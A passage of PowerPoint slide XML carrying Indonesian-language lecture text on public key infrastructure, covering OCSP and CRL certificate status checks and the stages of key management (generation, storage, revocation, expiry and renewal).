            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real-time. Server OCSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada CRL dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh interval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerbitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL.</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18237088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Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap-tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disalahgunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perpanjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbaharui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
